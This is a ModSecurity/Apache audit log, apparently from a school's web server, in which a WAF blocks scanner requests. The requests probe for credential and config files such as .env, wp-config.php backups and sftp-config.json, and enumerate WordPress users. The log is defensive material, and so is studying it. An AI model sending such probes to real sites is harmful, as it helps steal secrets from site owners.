1120 (- - -) Stopwatch2: 1749412278120943 1120; combined=325, p1=280, p2=0, p3=0, p4=0, p5=44, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d89fb62-Z-- --6feec250-A-- [09/Jun/2025:02:51:36 +0700] aEXpyIsoVckF-yt1MVz5LwAAAMo 103.236.140.4 48880 103.236.140.4 8181 --6feec250-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --6feec250-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6feec250-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412296260024 1312 (- - -) Stopwatch2: 1749412296260024 1312; combined=423, p1=369, p2=0, p3=0, p4=0, p5=54, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6feec250-Z-- --c8baf95a-A-- [09/Jun/2025:02:51:42 +0700] aEXpzsCyjFxjzV1Pwa1bIAAAAA8 103.236.140.4 49030 103.236.140.4 8181 --c8baf95a-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --c8baf95a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8baf95a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412302359708 951 (- - -) Stopwatch2: 1749412302359708 951; combined=333, p1=292, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8baf95a-Z-- --3e7bd142-A-- [09/Jun/2025:02:52:18 +0700] aEXp8qD1_iznf-QmBEC0nQAAAI8 103.236.140.4 49862 103.236.140.4 8181 --3e7bd142-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --3e7bd142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e7bd142-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412338402316 1490 (- - -) Stopwatch2: 1749412338402316 1490; combined=606, p1=548, p2=0, p3=0, p4=0, p5=58, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e7bd142-Z-- --471cb74b-A-- [09/Jun/2025:02:54:10 +0700] aEXqYsCyjFxjzV1Pwa1cOQAAABM 103.236.140.4 52562 103.236.140.4 8181 --471cb74b-B-- GET /public/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --471cb74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471cb74b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412450952862 774 (- - -) Stopwatch2: 1749412450952862 774; combined=318, p1=276, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471cb74b-Z-- --bf45230e-A-- [09/Jun/2025:02:55:25 +0700] aEXqrce0OZpePEzoRnp1vQAAAE0 103.236.140.4 54318 103.236.140.4 8181 --bf45230e-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --bf45230e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf45230e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412525452389 933 (- - -) Stopwatch2: 1749412525452389 933; combined=337, p1=289, p2=0, p3=0, p4=0, p5=48, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf45230e-Z-- --7a2eee3f-A-- [09/Jun/2025:03:04:47 +0700] aEXs36D1_iznf-QmBEC5QQAAAJA 103.236.140.4 60628 103.236.140.4 8181 --7a2eee3f-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.228.78.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.228.78.28 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: */* --7a2eee3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2eee3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749413087235710 28290 (- - -) Stopwatch2: 1749413087235710 28290; combined=55401, p1=226, p2=0, p3=0, p4=0, p5=27604, sr=65, sw=0, l=0, gc=27571 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2eee3f-Z-- --41f40620-A-- [09/Jun/2025:03:31:32 +0700] aEXzJIsoVckF-yt1MVz7LQAAAMI 103.236.140.4 60982 103.236.140.4 8181 --41f40620-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --41f40620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f40620-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749414692246756 859 (- - -) Stopwatch2: 1749414692246756 859; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f40620-Z-- --ed297311-A-- [09/Jun/2025:03:59:01 +0700] aEX5lU2r5gN9oSasJQzVXAAAAMY 103.236.140.4 33166 103.236.140.4 8181 --ed297311-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.194.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.194.42 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) Accept-Charset: utf-8 --ed297311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed297311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749416341853832 1203 (- - -) Stopwatch2: 1749416341853832 1203; combined=534, p1=496, p2=0, p3=0, p4=0, p5=38, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed297311-Z-- --06811363-A-- [09/Jun/2025:04:01:25 +0700] aEX6Ja6OGK25CtJ36rMf9wAAAAk 103.236.140.4 33188 103.236.140.4 8181 --06811363-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.68.62.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.68.62.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06811363-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06811363-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749416485239503 3687 (- - -) Stopwatch2: 1749416485239503 3687; combined=1506, p1=513, p2=956, p3=0, p4=0, p5=36, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06811363-Z-- --d9990b6e-A-- [09/Jun/2025:05:01:15 +0700] aEYIKxMDIkuu7kMwm-AtqAAAAI0 103.236.140.4 33704 103.236.140.4 8181 --d9990b6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.217.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.217.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9990b6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9990b6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749420075771680 3648 (- - -) Stopwatch2: 1749420075771680 3648; combined=1544, p1=528, p2=984, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9990b6e-Z-- --23331f0f-A-- [09/Jun/2025:05:03:05 +0700] aEYImWIgvuFVSPOFHr84nAAAAEA 103.236.140.4 33714 103.236.140.4 8181 --23331f0f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.90.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.90.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --23331f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23331f0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749420185580803 888 (- - -) Stopwatch2: 1749420185580803 888; combined=339, p1=296, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23331f0f-Z-- --d56ec577-A-- [09/Jun/2025:05:07:11 +0700] aEYJjxMDIkuu7kMwm-AtsAAAAIE 103.236.140.4 33826 103.236.140.4 8181 --d56ec577-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d56ec577-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d56ec577-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749420431213869 702 (- - -) Stopwatch2: 1749420431213869 702; combined=271, p1=238, p2=0, p3=0, p4=0, p5=32, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56ec577-Z-- --d982f302-A-- [09/Jun/2025:05:54:47 +0700] aEYUtxMDIkuu7kMwm-At7QAAAIQ 103.236.140.4 34242 103.236.140.4 8181 --d982f302-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --d982f302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d982f302-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749423287113947 850 (- - -) Stopwatch2: 1749423287113947 850; combined=404, p1=365, p2=0, p3=0, p4=0, p5=38, sr=156, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d982f302-Z-- --75c5a621-A-- [09/Jun/2025:05:56:02 +0700] aEYVAhMDIkuu7kMwm-At8wAAAI0 103.236.140.4 34282 103.236.140.4 8181 --75c5a621-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; Dillo 3.0) Accept-Charset: utf-8 --75c5a621-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75c5a621-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749423362686740 925 (- - -) Stopwatch2: 1749423362686740 925; combined=397, p1=341, p2=0, p3=0, p4=0, p5=55, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75c5a621-Z-- --c85cbb5c-A-- [09/Jun/2025:06:15:11 +0700] aEYZfxMDIkuu7kMwm-At-wAAAIA 103.236.140.4 34384 103.236.140.4 8181 --c85cbb5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.86.47.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.86.47.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; LYA-L29 Build/HUAWEILYA-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c85cbb5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c85cbb5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749424511719671 861 (- - -) Stopwatch2: 1749424511719671 861; combined=324, p1=283, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c85cbb5c-Z-- --c063f551-A-- [09/Jun/2025:07:30:31 +0700] aEYrJ02r5gN9oSasJQwHtAAAANg 103.236.140.4 36784 103.236.140.4 8181 --c063f551-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 20.253.155.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 20.253.155.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c063f551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c063f551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749429031598097 3217 (- - -) Stopwatch2: 1749429031598097 3217; combined=1520, p1=549, p2=935, p3=0, p4=0, p5=36, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c063f551-Z-- --145fad49-A-- [09/Jun/2025:07:33:51 +0700] aEYr702r5gN9oSasJQwKyAAAANc 103.236.140.4 47320 103.236.140.4 8181 --145fad49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --145fad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --145fad49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749429231968633 839 (- - -) Stopwatch2: 1749429231968633 839; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --145fad49-Z-- --fd67c263-A-- [09/Jun/2025:07:34:01 +0700] aEYr-a6OGK25CtJ36rNUjwAAAAw 103.236.140.4 47824 103.236.140.4 8181 --fd67c263-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fd67c263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd67c263-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749429241911117 925 (- - -) Stopwatch2: 1749429241911117 925; combined=443, p1=400, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd67c263-Z-- --9c1f0011-A-- [09/Jun/2025:07:49:12 +0700] aEYviBMDIkuu7kMwm-BuFQAAAIY 103.236.140.4 37574 103.236.140.4 8181 --9c1f0011-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.242.234.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.242.234.46 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --9c1f0011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c1f0011-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749430152752462 3206 (- - -) Stopwatch2: 1749430152752462 3206; 